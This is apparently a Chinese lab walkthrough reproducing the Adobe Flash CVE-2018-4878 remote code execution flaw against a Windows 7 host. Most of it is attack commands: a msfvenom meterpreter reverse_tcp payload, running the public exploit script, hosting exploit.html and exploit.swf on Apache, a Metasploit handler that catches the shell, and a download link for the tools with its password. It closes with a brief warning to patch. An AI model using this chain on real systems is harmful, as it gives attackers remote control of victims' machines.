漏洞概述
2018年2月1日, Adobe官方发布了Adobe Flash Player系列产品的安全通告(APSA18-01),该0day漏洞编号为CVE-2018-4878,目前最新版本28.0.0.137及其以前版本的Adobe Flash Player均受漏洞影响,Adobe官方于2月5日发布此漏洞补丁。
gongji者可以将恶意Flash文件嵌入Office文档,网页,或者桌面应用,当用户打开时便会受到gongji
此次复现为网页链接的方式进行复现受害者访问我们的flash链接就会被远程代码执行并且直接被getshell
gongji主机:Kali linux ip:172.16.221.213
受害者主机 window7 ip:172.16.221.247
实验用到的工具会在文章末尾分享
gongji主机配置
1.首先解压我们用到的文件
unzip CVE-2018-4878-master.zip
Adobe Flash cve-2018-4878 的漏洞复现_第1张图片
2.用msfvenom生成shell代码
msfvenom -p windows/meterpreter/reverse_tcp LHOST=172.16.221.213 LPORT=4444 -f python > code.txt
-p –payload < payload> 指定需要使用的payload
windows/meterpreter/reverse_tcp 我们选择使用的***载荷
LHOST指定ip地址
LPORT指定监听的端口可任意更改
-f –format < format> 指定输出格式 (使用 –help-formats 来获取msf支持的输出格式列表)
Adobe Flash cve-2018-4878 的漏洞复现_第2张图片
(1)查看代码文件
cat code.txt
Adobe Flash cve-2018-4878 的漏洞复现_第3张图片
(2)进入到我们解压用到的文件目录,编辑cve-2018-4878.py文件
Adobe Flash cve-2018-4878 的漏洞复现_第4张图片
修改下面的文件路径
Adobe Flash cve-2018-4878 的漏洞复现_第5张图片

    别忘了保存修改并退出

3.python执行脚本文件
python cve-2017-4878-master.py
Adobe Flash cve-2018-4878 的漏洞复现_第6张图片
ls 查看到生成了两个文件
4.启动Apache服务
(1)service apache2 startAdobe Flash cve-2018-4878 的漏洞复现_第7张图片
我们可以看到已经启动成功了
(2)将我们上两个文件复制到apache2服务的网页目录
cp exlpoit.html /var/www/html/exploit.html
cp exploit.swf /var/www/html/exploit.swf
Adobe Flash cve-2018-4878 的漏洞复现_第8张图片
现在我们的gongji环境基本配置完成,只要受害者访问我的链接就可以直接被远程控制
5.启动armitage:属于图形化的metasploit也方便演示
Adobe Flash cve-2018-4878 的漏洞复现_第9张图片
(1)使用handler监听模块
use exploit/multi/handlerAdobe Flash cve-2018-4878 的漏洞复现_第10张图片
(2)设置gongji载荷是我们在生成文件的时候所选择的gongji载荷
set payload windows/meterpreter/reverse_tcp
Adobe Flash cve-2018-4878 的漏洞复现_第11张图片
set lhost 172.16.221.213 设置gongji主机的ip
set lport 4444 设置监听端口为4444(我们在用msfvenom生成代码文件是设置的端口)
6.开启监听
exploit
Adobe Flash cve-2018-4878 的漏洞复现_第12张图片
7.windows7安装Adobeflash 28.0 后用浏览器访问http://172.16.221.213/exploit.html
Adobe Flash cve-2018-4878 的漏洞复现_第13张图片
8.此时我们可以看到Kali linux已经获取到sessions
Adobe Flash cve-2018-4878 的漏洞复现_第14张图片
复现完成,此时我们就可以查看一下系统配置
Adobe Flash cve-2018-4878 的漏洞复现_第15张图片
当然你也可以不用此图形化直接用命令行(命令都是一样的)
msfconsole 启动
Adobe Flash cve-2018-4878 的漏洞复现_第16张图片
Adobe Flash cve-2018-4878 的漏洞复现_第17张图片
顺便用shell查看下ip地址
在真实环境下,很多gongji会基于社会工程学诱导用户点击来达到gongji的目的,也希望大家小心陌生链接及时升级安全补丁,以免造成损失
工具链接:链接:https://pan.baidu.com/s/1kGmB2eZWf9PBFeXzyxOnkg 密码:ut52